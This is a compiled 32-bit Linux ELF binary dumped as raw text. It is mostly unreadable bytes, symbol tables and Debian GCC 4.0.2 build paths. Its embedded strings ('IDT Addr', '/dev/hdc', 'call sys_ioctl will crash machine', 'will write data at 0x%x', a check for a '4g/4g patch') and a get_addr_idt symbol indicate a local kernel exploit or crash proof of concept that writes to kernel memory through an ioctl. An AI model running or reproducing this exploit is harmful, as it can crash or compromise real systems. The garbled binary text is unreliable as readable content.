ELF44 ("444l l l ll  ((( Qtd/lib/ld-linux.so.2GNU   q<CJ55j./||[T  _Jv_RegisterClasses__gmon_start__libc.so.6printfstdoutperrorfflush__errno_location_IO_stdin_used__libc_start_mainopencloseGLIBC_2.0$ii H X\`dhlpt U(5P%T%Xh%\h%`h%dh%hh %lh(%ph0%th8p1^PTRhh0QVhׄUSQ[tX[ÐU=t+ ҡuÉU|tt h|ЃÐUMEU()ăEPhXE=u htEEEPhjhE}u= hƈl P+ hˈ E9E=u hЈ"EE h E h PEEEPh/ P{EEPhSuE}uX hƈu P4 hL hRD uE'E}E uEEUSU6]M ̀EEv‹E؉EE[]ÐUWVS [ )Eu [^_]Ð&1֍G;}r [^_]Í'UWVS [Þ )EHt41G9}uD [^_]ÐUSRltlЋCuX[]ÐUSP[X[[++]user stack addr %p [--]this kernel patched 4g/4g patch,no vulnerability! [++]IDT Addr %p /dev/hdc[--]open[++]this OS in Real Linux [++]this OS maybe in VMWARE [++]call sys_ioctl will crash machine [++]will write data at 0x%x ioctl[--]still aliving $ h 4HL L@(oooނƃփxGCC: (GNU) 4.0.2 (Debian 4.0.2-2)GCC: (GNU) 4.0.2 (Debian 4.0.2-2)GCC: (GNU) 4.0.2 (Debian 4.0.2-2)GCC: (GNU) 4.0.2 (Debian 4.0.2-2)GCC: (GNU) 4.0.2 (Debian 4.0.2-2)GCC: (GNU) 4.0.2 (Debian 4.0.2-2)GCC: (GNU) 4.0.2 (Debian 4.0.2-2)",4h 4$$J}!y_IO_stdin_used2../sysdeps/i386/elf/start.S/space/debian/glibc/build-area/glibc-2.3.5/build-tree/glibc-2.3.5/csuGNU AS 2.16.1X44F}exgMintWs\}nTOV|/space/debian/glibc/build-area/glibc-2.3.5/build-tree/i386-libc/csu/crti.S/space/debian/glibc/build-area/glibc-2.3.5/build-tree/glibc-2.3.5/csuGNU AS 2.16.1f(/space/debian/glibc/build-area/glibc-2.3.5/build-tree/i386-libc/csu/crtn.S/space/debian/glibc/build-area/glibc-2.3.5/build-tree/glibc-2.3.5/csuGNU AS 2.16.1%% $ > $ > 4: ; I?  &I%%T/ ../sysdeps/i386/elfstart.S01:"VWYX  init.c^ /space/debian/glibc/build-area/glibc-2.3.5/build-tree/i386-libc/csucrti.S43,Wh#,:4 ,Wdd,,W^ /space/debian/glibc/build-area/glibc-2.3.5/build-tree/i386-libc/csucrtn.SJ} /space/debian/glibc/build-area/glibc-2.3.5/build-tree/glibc-2.3.5/csuinit.cshort intlong long intunsigned charlong long unsigned intshort unsigned int_IO_stdin_usedGNU C 4.0.2 (Debian 4.0.2-2).symtab.strtab.shstrtab.interp.note.ABI-tag.hash.dynsym.dynstr.gnu.version.gnu.version_r.rel.dyn.rel.plt.init.text.fini.rodata.eh_frame.ctors.dtors.jcr.dynamic.got.got.plt.data.bss.comment.debug_aranges.debug_pubnames.debug_info.debug_abbrev.debug_line.debug_str#(( 1HHD7 ?LLGoނTo c l ((@ uhhp{$44PPhh ll tt ||  HH LL ,xx    x % }v0'!6 (HLނ( h   4 Phlt|HLx !4 lt-|:IP` f rpxh| @ lllLl-q>PEWi|vX 5h Ȅ  0c ׄ   x /)4 /|?FKTZxg { call_gmon_start__CTOR_LIST____DTOR_LIST____JCR_LIST__completed.4386p.4385__do_global_dtors_auxframe_dummy__CTOR_END____DTOR_END____FRAME_END____JCR_END____do_global_ctors_auxsys_ioctl_DYNAMIC__fini_array_end__fini_array_start__init_array_end_GLOBAL_OFFSET_TABLE___init_array_startclose@@GLIBC_2.0_fp_hwperror@@GLIBC_2.0fflush@@GLIBC_2.0__dso_handle__libc_csu_fini__errno_location@@GLIBC_2.0_initget_addr_idtstdout@@GLIBC_2.0_start__libc_csu_init__bss_startmain__libc_start_main@@GLIBC_2.0data_startprintf@@GLIBC_2.0_finiopen@@GLIBC_2.0_edata_end_IO_stdin_used__data_start_Jv_RegisterClasses__gmon_start__